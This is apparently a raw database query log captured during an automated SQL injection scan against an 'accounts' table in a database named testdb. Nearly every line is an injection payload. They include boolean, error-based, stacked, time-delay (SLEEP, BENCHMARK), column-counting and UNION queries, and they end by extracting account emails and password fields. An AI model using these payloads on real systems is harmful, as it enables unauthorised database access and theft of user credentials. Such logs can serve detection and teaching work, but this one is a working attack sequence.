SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1)(.\'.,(((
SELECT * FROM accounts WHERE account_id=1'BvHjQF<'\>GLHpNB
SELECT * FROM accounts WHERE account_id=1) AND 1644=5902-- mIQr
SELECT * FROM accounts WHERE account_id=1) AND 3483=3483-- mCTF
SELECT * FROM accounts WHERE account_id=1) AND 7156=8806 AND (1768=1768
SELECT * FROM accounts WHERE account_id=1) AND 3483=3483 AND (7213=7213
SELECT * FROM accounts WHERE account_id=1)) AND 5775=6370 AND ((9758=9758
SELECT * FROM accounts WHERE account_id=1)) AND 3483=3483 AND ((4199=4199
SELECT * FROM accounts WHERE account_id=1))) AND 8588=7276 AND (((4761=4761
SELECT * FROM accounts WHERE account_id=1))) AND 3483=3483 AND (((5581=5581
SELECT * FROM accounts WHERE account_id=1 AND 7535=5477
SELECT * FROM accounts WHERE account_id=1 AND 3483=3483
SELECT * FROM accounts WHERE account_id=1 AND 4205=6537
SELECT * FROM accounts WHERE account_id=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b767171,(SELECT (ELT(7235=7235,1))),0x716a787a71,0x78))s), 8446744073709551610, 8446744073709551610)))
SELECT * FROM accounts WHERE account_id=1 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b767171,(SELECT (ELT(8522=8522,1))),0x716a787a71,0x78))s), 8446744073709551610, 8446744073709551610)))
SELECT * FROM accounts WHERE account_id=1 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x716b767171,(SELECT (ELT(1233=1233,1))),0x716a787a71,0x78))x))
SELECT * FROM accounts WHERE account_id=1 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x716b767171,(SELECT (ELT(9656=9656,1))),0x716a787a71,0x78))x))
SELECT * FROM accounts WHERE account_id=1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x716b767171,(SELECT (ELT(6029=6029,1))),0x716a787a71)) USING utf8)))
SELECT * FROM accounts WHERE account_id=1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x716b767171,(SELECT (ELT(4192=4192,1))),0x716a787a71)) USING utf8)))
SELECT * FROM accounts WHERE account_id=1 AND (SELECT 1457 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (ELT(1457=1457,1))),0x716a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
SELECT * FROM accounts WHERE account_id=(SELECT CONCAT(0x716b767171,(SELECT (ELT(6218=6218,1))),0x716a787a71))
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1
SELECT * FROM accounts WHERE account_id=1;SELECT SLEEP(5)#
SELECT * FROM accounts WHERE account_id=1;SELECT SLEEP(5)
SELECT * FROM accounts WHERE account_id=1;(SELECT * FROM (SELECT(SLEEP(5)))btLq)#
SELECT * FROM accounts WHERE account_id=1;(SELECT * FROM (SELECT(SLEEP(5)))Iood)
SELECT * FROM accounts WHERE account_id=1;SELECT BENCHMARK(5000000,MD5(0x79524470))#
SELECT * FROM accounts WHERE account_id=1;SELECT BENCHMARK(5000000,MD5(0x41486c73))
SELECT * FROM accounts WHERE account_id=1 AND SLEEP(5)
SELECT * FROM accounts WHERE account_id=1 AND SLEEP(0)
SELECT * FROM accounts WHERE account_id=1 AND SLEEP(5)
SELECT * FROM accounts WHERE account_id=1 ORDER BY 1-- KFSZ
SELECT * FROM accounts WHERE account_id=1 ORDER BY 2890-- zZdL
SELECT * FROM accounts WHERE account_id=1 ORDER BY 10-- QUFe
SELECT * FROM accounts WHERE account_id=1 ORDER BY 6-- VBKi
SELECT * FROM accounts WHERE account_id=1 ORDER BY 8-- ovzg
SELECT * FROM accounts WHERE account_id=1 ORDER BY 7-- YduW
SELECT * FROM accounts WHERE account_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,0x5a656d4a61567878716b7545585a6a556d4b676977656a764f4f454a6e6572437154465256624672,0x716a787a71),NULL,NULL,NULL-- LZEc
SELECT * FROM accounts WHERE account_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,0x5a656d4a61567878716b7545585a6a556d4b676977656a764f4f454a6e6572437154465256624672,0x716a787a71),NULL,NULL,NULL UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,0x4b464e787a6e504f72424d4f4d414d4b685a4a4672794f5a68445a5146514a684d6a7665564c4275,0x716a787a71),NULL,NULL,NULL-- WhCn
SELECT * FROM accounts WHERE account_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x716a787a71),NULL,NULL,NULL-- Ofoj
SELECT * FROM accounts WHERE account_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,IFNULL(CAST(table_name AS CHAR),0x20),0x716a787a71),NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x746573746462)-- yUec
SELECT * FROM accounts WHERE account_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,IFNULL(CAST(column_name AS CHAR),0x20),0x617a776a7a6e,IFNULL(CAST(column_type AS CHAR),0x20),0x716a787a71),NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6163636f756e7473 AND table_schema=0x746573746462-- pnRR
SELECT * FROM accounts WHERE account_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,IFNULL(CAST(account_added AS CHAR),0x20),0x617a776a7a6e,IFNULL(CAST(account_email AS CHAR),0x20),0x617a776a7a6e,IFNULL(CAST(account_id AS CHAR),0x20),0x617a776a7a6e,IFNULL(CAST(account_lastactive AS CHAR),0x20),0x617a776a7a6e,IFNULL(CAST(account_pass AS CHAR),0x20),0x617a776a7a6e,IFNULL(CAST(role_id AS CHAR),0x20),0x716a787a71),NULL,NULL,NULL FROM testdb.accounts-- XVAV
